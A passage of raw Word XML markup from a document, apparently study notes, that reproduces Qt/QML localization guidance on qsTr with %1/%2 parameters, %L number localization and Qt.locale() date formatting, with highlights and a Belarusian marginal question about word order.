      </w:r>
      <w:bookmarkEnd w:id="1125"/>
      <w:bookmarkEnd w:id="1126"/>
      <w:bookmarkEnd w:id="1127"/>
      <w:bookmarkEnd w:id="1128"/>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BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Different languages put words together in different orders</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> so it is not a good idea to create sentences by concatenating words and data. Instead, use</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to insert parameters into strings. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD1D40">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following snippet has a string with two number parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%1</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%2</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. These parameters are inserted with the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.arg()</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>functions.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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text</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 xml:space="preserve"> qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"File %1 of %2"</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arg</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counter</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arg</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total</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="004A2B67" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%1 refers to the first parameter and</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%2</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>refers to the second parameter so this code produces output like: "File 2 of 3".</w:t>
      </w:r>
      <w:r w:rsidR="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A2B67" w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="004A2B67" w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>а калі я хачу змяніць парадак следавання словаў у іншай мове, то што мне рабіць?</w:t>
      </w:r>
      <w:r w:rsidR="004A2B67" w:rsidRPr="004A2B67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="00151DA9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1129" w:name="5-use-lx-so-numbers-are-localized"/>
      <w:bookmarkStart w:id="1130" w:name="_Toc483000770"/>
      <w:bookmarkStart w:id="1131" w:name="_Toc483003768"/>
      <w:bookmarkStart w:id="1132" w:name="_Toc483604122"/>
      <w:bookmarkStart w:id="1133" w:name="_Toc483605342"/>
      <w:bookmarkEnd w:id="1129"/>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Use %Lx so Numbers are Localized</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1130"/>
      <w:bookmarkEnd w:id="1131"/>
      <w:bookmarkEnd w:id="1132"/>
      <w:bookmarkEnd w:id="1133"/>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5211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you include the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%L</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">modifier when you specify a parameter, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>number is localized</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> according to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>current regional settings</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For example, in the following code snippet,</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%L1</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>means to format the first parameters according to the number formatting conventions of the currently selected locale (geographical region):</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</w:t>
      </w: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text</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 xml:space="preserve"> qsTr</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"%L1"</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arg</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total</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="00395997" w:rsidRDefault="005211D0" w:rsidP="005211D0">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then, with the above code, if</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>total</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the number "4321.56" (four thousand three hundred and twenty one point fifty six); with English regional settings, (locale) the output is "4,321.56"; with German regional settings, the output is "4.321,56".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005211D0" w:rsidRPr="005211D0" w:rsidRDefault="005211D0" w:rsidP="00151DA9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1134" w:name="6-internationalize-dates-times-and-curre"/>
      <w:bookmarkStart w:id="1135" w:name="_Toc483000771"/>
      <w:bookmarkStart w:id="1136" w:name="_Toc483003769"/>
      <w:bookmarkStart w:id="1137" w:name="_Toc483604123"/>
      <w:bookmarkStart w:id="1138" w:name="_Toc483605343"/>
      <w:bookmarkEnd w:id="1134"/>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00151DA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internationalize Dates, Times and Currencies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1135"/>
      <w:bookmarkEnd w:id="1136"/>
      <w:bookmarkEnd w:id="1137"/>
      <w:bookmarkEnd w:id="1138"/>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395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>There are no special in-string modifiers for formatting dates and times</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Instead, you need to query the current locale (geographical region) and use the methods of</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId678" w:history="1">
        <w:r w:rsidRPr="00395997">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Date</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to format the string.</w:t>
      </w:r>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395997">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt.locale()</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>returns a</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId679" w:history="1">
        <w:r w:rsidRPr="00395997">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Locale</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">object which </w:t>
      </w:r>
      <w:r w:rsidRPr="00395997">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>contains all kinds of information about the locale</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. In particular, the</w:t>
      </w:r>
      <w:r w:rsidRPr="005211D0">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId680" w:anchor="name-prop" w:history="1">
        <w:r w:rsidRPr="00395997">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
